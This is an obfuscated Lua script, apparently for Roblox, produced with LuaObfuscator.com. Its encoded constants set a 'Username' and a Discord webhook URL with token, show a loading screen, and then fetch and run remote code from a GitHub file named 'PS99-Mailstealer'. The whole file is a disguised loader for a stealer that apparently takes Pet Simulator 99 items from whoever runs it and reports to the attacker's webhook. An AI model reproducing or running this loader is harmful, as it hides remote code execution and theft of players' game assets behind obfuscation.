--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.2) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=0 -0 ;local v32;while true do if (v31==(2 -(620 -(555 + 64)))) then return v32;end if (v31==0) then v32=v1(v16,v19,v19);v19=v19 + (1 -0) ;v31=2 -1 ;end end end v23=nil;function v23() local v33,v34=v1(v16,v19,v19 + (933 -(857 + 74)) );v19=v19 + (570 -(367 + 201)) ;return (v34 * (1183 -(214 + 713))) + v33 ;end v18=3;end if (v18==4) then function v25() local v35=v24();local v36=v24();local v37=1;local v38=(v21(v36,1 + 0 ,4 + 16 ) * ((879 -(282 + 595))^(1669 -(1523 + 84 + 30)))) + v35 ;local v39=v21(v36,19 + 2 ,(170 -127) -12 );local v40=((v21(v36,1097 -(68 + 997) )==(1271 -(226 + 1044))) and  -(4 -3)) or (118 -(32 + 85)) ;if (v39==(0 + 0)) then if (v38==(0 + 0)) then return v40 * (957 -(892 + 65)) ;else v39=2 -1 ;v37=0 -0 ;end elseif (v39==(3757 -1710)) then return ((v38==0) and (v40 * ((351 -(87 + (1215 -(802 + 150))))/0))) or (v40 * NaN) ;end return v8(v40,v39-(1203 -(67 + (303 -190))) ) * (v37 + (v38/((2 + (0 -0))^((93 + 34) -75)))) ;end v26=nil;function v26(v41) local v42;if  not v41 then v41=v24();if (v41==(997 -(915 + 82))) then return "";end end v42=v3(v16,v19,(v19 + v41) -(2 -1) );v19=v19 + v41 ;local v43={};for v66=1 + 0 , #v42 do v43[v66]=v2(v1(v3(v42,v66,v66)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29() local v44=0 -0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do local v68=0;while true do if (v68~=0) then else if (v44==3) then local v94=0;while true do if (v94~=0) then else for v116=1,v24() do v46[v116-1 ]=v29();end return v48;end end end if ((0 + 0)~=v44) then else local v95=0;while true do if (v95~=1) then else v47={};v44=1 + 0 ;break;end if (v95~=(0 -0)) then else local v115=0;while true do if (v115==1) then v95=15 -(9 + 5) ;break;end if (v115==(376 -(85 + 291))) then v45={};v46={};v115=1;end end end end end v68=1;end if (v68==1) then if (v44==(1267 -(243 + 1022))) then for v97=3 -2 ,v49 do local v98=0 + 0 ;local v99;local v100;local v101;while true do if (v98~=0) then else v99=1180 -(1123 + 57) ;v100=nil;v98=1 + 0 ;end if (v98==(255 -(163 + 91))) then v101=nil;while true do if (v99==1) then if (v100==(1931 -(1869 + 61))) then v101=v22()~=0 ;elseif (v100==(1 + 1)) then v101=v25();elseif (v100~=3) then else v101=v26();end v50[v97]=v101;break;end if (v99==0) then local v119=0;local v120;while true do if (v119==(0 -0)) then v120=0 -0 ;while true do if (v120==(0 + 0)) then local v164=0 -0 ;while true do if (v164==1) then v120=1;break;end if (0==v164) then v100=v22();v101=nil;v164=1;end end end if (v120==(1 + 0)) then v99=1475 -(1329 + 145) ;break;end end break;end end end end break;end end end v48[974 -(140 + 831) ]=v22();for v102=1851 -(1409 + 441) ,v24() do local v103=0;local v104;local v105;local v106;while true do if (v103~=0) then else v104=718 -(15 + 703) ;v105=nil;v103=1;end if (v103==(1 + 0)) then v106=nil;while true do if (v104==(438 -(262 + 176))) then v105=0;v106=nil;v104=1;end if (v104~=1) then else while true do if (v105~=(1721 -(345 + 1376))) then else v106=v22();if (v21(v106,689 -(198 + 490) ,1)~=0) then else local v158=0 -0 ;local v159;local v160;local v161;local v162;local v163;while true do if (v158~=(4 -2)) then else v163=nil;while true do if (v159~=(1208 -(696 + 510))) then else while true do if (v160~=0) then else local v170=0 -0 ;while true do if (v170==(1263 -(1091 + 171))) then v160=1;break;end if (0~=v170) then else v161=v21(v106,1 + 1 ,9 -6 );v162=v21(v106,12 -8 ,380 -(123 + 251) );v170=1;end end end if (2==v160) then if (v21(v162,1,1)==1) then v163[2]=v50[v163[9 -7 ]];end if (v21(v162,700 -(208 + 490) ,1 + 1 )==1) then v163[3]=v50[v163[2 + 1 ]];end v160=839 -(660 + 176) ;end if (v160~=1) then else v163={v23(),v23(),nil,nil};if (v161==(0 + 0)) then local v176=0 + 0 ;local v177;local v178;while true do if (v176~=(1 + 0)) then else while true do if (0~=v177) then else v178=0 -0 ;while true do if ((0 -0)==v178) then v163[8 -5 ]=v23();v163[3 + 1 ]=v23();break;end end break;end end break;end if (v176==(0 + 0)) then v177=396 -(115 + 281) ;v178=nil;v176=2 -1 ;end end elseif (v161==1) then v163[3 + 0 ]=v24();elseif (v161==(4 -2)) then v163[3]=v24() -((7 -5)^(883 -(550 + 317))) ;elseif (v161~=3) then else local v183=0 -0 ;local v184;while true do if (v183==(0 -0)) then v184=0;while true do if ((0 -0)==v184) then v163[3]=v24() -(2^16) ;v163[289 -(134 + 151) ]=v23();break;end end break;end end end v160=2;end if (3~=v160) then else if (v21(v162,1668 -(970 + 695) ,3)~=1) then else v163[7 -3 ]=v50[v163[4]];end v45[v102]=v163;break;end end break;end if (v159==(1991 -(582 + 1408))) then local v169=0;while true do if (v169==(0 -0)) then v162=nil;v163=nil;v169=1;end if (v169~=(1 -0)) then else v159=2;break;end end end if (v159~=0) then else v160=0 -0 ;v161=nil;v159=1825 -(1195 + 629) ;end end break;end if (0~=v158) then else v159=0 -0 ;v160=nil;v158=1;end if (v158==(242 -(187 + 54))) then v161=nil;v162=nil;v158=782 -(162 + 618) ;end end end break;end end break;end end break;end end end v44=3;end if (v44~=(1 + 0)) then else v48={v45,v46,nil,v47};v49=v24();v50={};v44=2;end break;end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v51) if (v1(v51,2)==79) then local v69=0;while true do if (v69==0) then v20=v0(v3(v51,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v51,16));if v20 then local v107=0;local v108;while true do if (v107==1) then return v108;end if (v107==0) then v108=v5(v71,v20);v20=nil;v107=1;end end else return v71;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v52,v53,v54,v55=v1(v16,v19,v19 + (6 -3) );v19=v19 + (6 -2) ;return (v55 * 16777216) + (v54 * (5125 + 60411)) + (v53 * 256) + v52 ;end v25=nil;v18=4;end if (v18==7) then function v30(v56,v57,v58) local v59=0;local v60;local v61;local v62;while true do if (v59==0) then v60=v56[1];v61=v56[2];v59=1;end if (v59==1) then v62=v56[3];return function(...) local v78=v60;local v79=v61;local v80=v62;local v81=v28;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do local v93=0;while true do if (v93==0) then v90=v78[v82];v91=v90[1];v93=1;end if (v93==1) then if (v91<=4) then if (v91<=1) then if (v91>0) then do return;end else v88[v90[2]]=v90[3];end elseif (v91<=2) then local v123=0;local v124;while true do if (v123==0) then v124=v90[2];v88[v124]=v88[v124](v13(v88,v124 + 1 ,v83));break;end end elseif (v91==3) then v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v58[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v58[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v58[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3]~=0 ;v82=v82 + 1 ;v90=v78[v82];v58[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v58[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v58[v90[3]];else v88[v90[2]]=v58[v90[3]];end elseif (v91<=7) then if (v91<=5) then local v125;local v126,v127;local v128;v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v128=v90[2];v126,v127=v81(v88[v128](v13(v88,v128 + 1 ,v90[3])));v83=(v127 + v128) -1 ;v125=0;for v139=v128,v83 do v125=v125 + 1 ;v88[v139]=v126[v125];end v82=v82 + 1 ;v90=v78[v82];v128=v90[2];v88[v128]=v88[v128](v13(v88,v128 + 1 ,v83));v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]();v82=v82 + 1 ;v90=v78[v82];do return;end elseif (v91>6) then v58[v90[3]]=v88[v90[2]];else v88[v90[2]]=v90[3]~=0 ;end elseif (v91<=8) then local v134=v90[2];local v135=v88[v90[3]];v88[v134 + 1 ]=v135;v88[v134]=v135[v90[4]];elseif (v91==9) then v88[v90[2]]();else local v151=0;local v152;local v153;local v154;local v155;while true do if (v151==0) then v152=v90[2];v153,v154=v81(v88[v152](v13(v88,v152 + 1 ,v90[3])));v151=1;end if (v151==2) then for v166=v152,v83 do v155=v155 + 1 ;v88[v166]=v153[v155];end break;end if (v151==1) then v83=(v154 + v152) -1 ;v155=0;v151=2;end end end v82=v82 + 1 ;break;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v63,v64,v65) if v65 then local v72=1581 -(1535 + 46) ;local v73;while true do if (v72==(0 + 0)) then v73=(v63/((1638 -(1373 + 263))^(v64-1)))%((1002 -(451 + 361 + 188))^(((v65-(1 + 0)) -(v64-1)) + (1 -0))) ;return v73-(v73%(1 -(0 -0))) ;end end else local v74=(1386 -((1349 -(268 + 335)) + 638))^(v64-((291 -(60 + 230)) + 0)) ;return (((v63%(v74 + v74))>=v74) and (1 -0)) or (341 -(218 + (695 -(426 + 146)))) ;end end v22=nil;v18=2;end end end v15("LOL!0B3O0003083O00557365726E616D6503083O004467586B737A2O3103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313231333830313236393630313530313237352F6237675F682O6D79537351644A744272362O5677483339554D4B55706A4250664A67584B3634576C545239486E304A344F6B6456544952746F31747A626D6C586465726403153O0073656C65637465644C6F6164696E675363722O656E03013O0034030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C79706865725363726970742F50532O392D4D61696C737465616C65722F6D61696E2F50532O394D61696C737465616C657200103O0012033O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00058O00013O00124O00073O00124O00083O00122O000100093O00200800010001000A0012050003000B6O000100039O0000026O000100016O00017O00",v9(),...);
